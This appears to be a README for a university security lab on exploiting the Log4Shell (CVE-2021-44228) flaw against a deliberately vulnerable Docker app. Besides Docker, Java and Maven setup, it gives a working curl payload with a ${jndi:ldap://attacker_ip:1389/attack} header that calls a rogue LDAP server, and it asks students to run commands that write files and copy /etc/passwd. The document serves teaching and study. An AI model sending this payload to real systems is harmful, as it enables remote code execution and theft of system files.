daffychuy/Log4j-Exploit

Warning: This Repository is only for educational purposes.

Introduction

Welcome to the Log4j lab for PRA9201.

In this lab we will explore the exploitation of the JNDI lookup in Log4j 2 (CVE-2021-44228, "Log4Shell"): when the vulnerable application logs a string containing `${jndi:ldap://...}`, Log4j performs the lookup against an attacker-controlled LDAP server and acts on whatever that server returns, which is what gives the attacker code execution on the victim.

This lab works on Windows, macOS (Intel and M1) and Linux.

Prerequisites

You need Docker, a Java runtime and Maven. If you need help installing them, follow the setup steps below.

Setup the environment

Note: The following instructions are for Debian-based systems only.

Docker Setup

# Set up the repository
sudo apt update
sudo apt install ca-certificates curl gnupg lsb-release

# Add Docker's official GPG key
# NOTE: the URLs below are Docker's Ubuntu repository; on Debian itself use
# https://download.docker.com/linux/debian in both of the following commands
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg

# Set the Docker channel to stable
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

# Install Docker engine
sudo apt update
sudo apt install docker-ce docker-ce-cli containerd.io

# Verify Docker is working
sudo docker run hello-world

Java Setup

sudo apt update
# default-jre is enough to run the built jar; compiling the attacker's program with
# mvn package needs a JDK (sudo apt install default-jdk) if apt does not already pull one in with maven
sudo apt install default-jre

Maven Setup

sudo apt update
sudo apt install maven

Lab Instructions

Setting up victim and attacker's environment

Setting up victim's environment

# Go into the /victim folder
cd victim

# Build and run the victim's server with the vulnerability
docker build . -t victim-vulnerable-app
docker run --name victim -p 8080:8080 victim-vulnerable-app
# To verify the container is working, open http://ip_addr:8080 in your browser
# (ip_addr is the address of the machine running Docker, or localhost on that machine).
# You should see a page, but with an error; that is expected.

Setting up attacker's environment

# Go into the /attacker folder
cd attacker

# Package the Java program (this builds the rogue LDAP server jar under target/)
mvn package

# Run the attacker's malicious LDAP server
# TODO: Figure out how to run the LDAP server
# (Lab Q5.)
# HINT: Run java -jar target/RogueJndi-1.1.jar -h
# HINT 2: What is the attacker's IP? (The victim must be able to reach it on port 1389.)

Executing the attack

# Send the attack payload to the victim's server: the header value is logged by the
# vulnerable Log4j, which resolves the ${jndi:...} lookup against the attacker's LDAP server
# HINT: What is the victim's IP?
# NOTE: Make sure you replace victim_ip and attacker_ip
curl victim_ip:8080 -H 'X-Api-Version: ${jndi:ldap://attacker_ip:1389/attack}'

# Check inside the victim container (e.g. with docker exec) whether the file has been created/modified

Lab Questions

Here's the link to the Google Drive document for you to copy and write your answers in: link.

  1. How does the vulnerability in Log4j work in terms of JNDI?
  2. What did people do when they discovered the vulnerability?
    • What steps did they take to prevent any further exploitation?
  3. Why do you need a dedicated malicious LDAP server, instead of using any of the existing ones on the internet?
  4. Why do you need to execute the java command to spin up a server before you execute curl?
  5. Execute the LDAP server command to touch a file at /tmp/ha-pwned, and provide a screenshot of ls -la /tmp/ as well as the command executed.
  6. Modify the previous command, but now copy /etc/passwd into /tmp/ha-pwned, and provide a screenshot of cat /tmp/ha-pwned as well as the command executed.
